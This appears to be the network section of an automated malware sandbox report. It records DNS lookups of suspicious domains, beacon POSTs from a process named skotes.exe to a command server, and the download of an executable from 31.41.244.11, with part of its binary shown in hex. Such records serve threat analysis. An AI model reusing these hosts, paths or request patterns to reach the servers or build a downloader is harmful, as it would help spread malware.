                                                                                                                                                              Dec 18, 2024 11:47:56.532058954 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.532130003 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.532350063 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.532740116 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.532850981 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.532906055 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.533097982 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.533473969 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.533518076 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.533555031 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.533623934 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.534267902 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.534384966 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.534396887 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.534604073 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.534993887 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.535103083 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.535139084 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.535139084 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.535868883 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.535952091 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.535986900 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.535986900 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.536603928 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.536701918 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.536737919 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.536737919 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.537300110 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.537336111 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.537437916 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.537486076 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.538201094 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.538250923 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.538312912 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.538369894 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.538990974 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.539004087 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.539026022 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.539207935 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.539536953 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.539602995 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.539633036 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.539720058 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.540307045 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.540452003 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.540481091 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.540529013 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.541069031 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.541109085 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.541141987 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.541214943 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.541873932 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.541944981 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.541970968 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.542017937 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.542551041 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.542615891 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.542726040 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.542845011 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.543389082 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.543507099 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.543520927 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.543592930 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.544078112 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.544202089 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.544234991 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.544234991 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.544795990 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.544940948 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.544954062 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.545119047 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.545676947 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.545732021 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.545891047 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.545948029 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.547175884 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.547271013 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.547283888 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.547327995 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.547682047 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.547727108 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.547758102 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.547806978 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.548218966 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.548257113 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.548291922 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.548362017 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.548856020 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.548892975 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.548929930 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.549134970 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.549496889 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.549536943 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.549580097 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.549671888 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.550276995 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.550317049 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.550348043 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.550452948 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.551069021 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.551140070 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.551140070 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.551172018 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.551631927 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.551668882 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.551768064 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.551809072 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.552357912 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.552393913 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.552505016 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.552539110 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.553100109 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.553138018 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.553214073 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.553276062 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.553963900 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.554048061 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.554076910 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.554106951 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.554632902 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.554702997 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.554744005 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.554858923 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.555380106 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.555474043 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.555495977 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.555525064 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.556130886 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.556185961 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.556195974 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.556236029 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.556925058 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.556973934 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.557029963 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.557147980 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.557687998 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.557734013 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.557812929 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.557876110 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.558387995 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.558487892 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.558500051 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.558559895 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.559169054 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.559210062 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.559250116 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.559284925 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.559902906 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.559945107 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.560002089 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.560115099 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.560652018 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.560719967 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.560816050 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.561141968 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.561431885 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.561526060 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.561614037 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.561657906 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.562165976 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Dec 18, 2024 11:47:41.096117020 CET192.168.2.61.1.1.10x42b1Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:41.406694889 CET192.168.2.61.1.1.10xbf10Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:52.534648895 CET192.168.2.61.1.1.10xe89eStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:52.534756899 CET192.168.2.61.1.1.10x411dStandard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:57.042363882 CET192.168.2.61.1.1.10x3378Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:57.042443037 CET192.168.2.61.1.1.10x931Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:00.842936039 CET192.168.2.61.1.1.10x3ac9Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:00.843048096 CET192.168.2.61.1.1.10xd59eStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:01.304750919 CET192.168.2.61.1.1.10x4eb4Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:25.116307020 CET192.168.2.61.1.1.10xae8dStandard query (0)twentytk20pn.topA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:25.116365910 CET192.168.2.61.1.1.10x5572Standard query (0)twentytk20pn.top28IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:28.653994083 CET192.168.2.61.1.1.10xf4e4Standard query (0)twentytk20pn.topA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:28.654078007 CET192.168.2.61.1.1.10x906bStandard query (0)twentytk20pn.top28IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:32.999910116 CET192.168.2.61.1.1.10x669cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:33.000344992 CET192.168.2.61.1.1.10xb5b8Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:36.119143009 CET192.168.2.61.1.1.10x233fStandard query (0)twentytk20pn.topA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:36.119400978 CET192.168.2.61.1.1.10xc5f2Standard query (0)twentytk20pn.top28IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:39.037070990 CET192.168.2.61.1.1.10xf4dbStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:39.037116051 CET192.168.2.61.1.1.10x8216Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Dec 18, 2024 11:47:41.397867918 CET1.1.1.1192.168.2.60x42b1Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:41.717420101 CET1.1.1.1192.168.2.60xbf10No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:41.717420101 CET1.1.1.1192.168.2.60xbf10No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:52.770452023 CET1.1.1.1192.168.2.60xe89eNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:52.770452023 CET1.1.1.1192.168.2.60xe89eNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:47:57.760705948 CET1.1.1.1192.168.2.60x3378No error (0)home.twentytk20pn.top185.185.71.170A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:00.980875969 CET1.1.1.1192.168.2.60x3ac9No error (0)home.twentytk20pn.top185.185.71.170A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:01.720529079 CET1.1.1.1192.168.2.60x4eb4No error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:01.720529079 CET1.1.1.1192.168.2.60x4eb4No error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:25.416999102 CET1.1.1.1192.168.2.60xae8dNo error (0)twentytk20pn.top185.185.71.170A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:28.792583942 CET1.1.1.1192.168.2.60xf4e4No error (0)twentytk20pn.top185.185.71.170A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:33.137098074 CET1.1.1.1192.168.2.60xb5b8No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:33.138863087 CET1.1.1.1192.168.2.60x669cNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:36.257026911 CET1.1.1.1192.168.2.60x233fNo error (0)twentytk20pn.top185.185.71.170A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 18, 2024 11:48:39.176589966 CET1.1.1.1192.168.2.60xf4dbNo error (0)home.twentytk20pn.top185.185.71.170A (IP address)IN (0x0001)false
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.649789185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:05.667301893 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 4
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                              Dec 18, 2024 11:47:06.994314909 CET219INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:06 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.649796185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:08.629635096 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 160
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                              Dec 18, 2024 11:47:11.859625101 CET696INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:11 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 31 66 39 0d 0a 20 3c 63 3e 31 30 31 36 38 37 35 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 38 37 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 30 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 36 38 37 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 66 37 30 39 36 34 65 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 38 37 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 [TRUNCATED]
                                                                                                                                                              Data Ascii: 1f9 <c>1016875001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1016876001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1016877001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#1016878001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1016879001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#<d>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.64980631.41.244.11806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:12.063829899 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:13.770374060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:13 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 4438776
                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "675784f0-43baf8"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
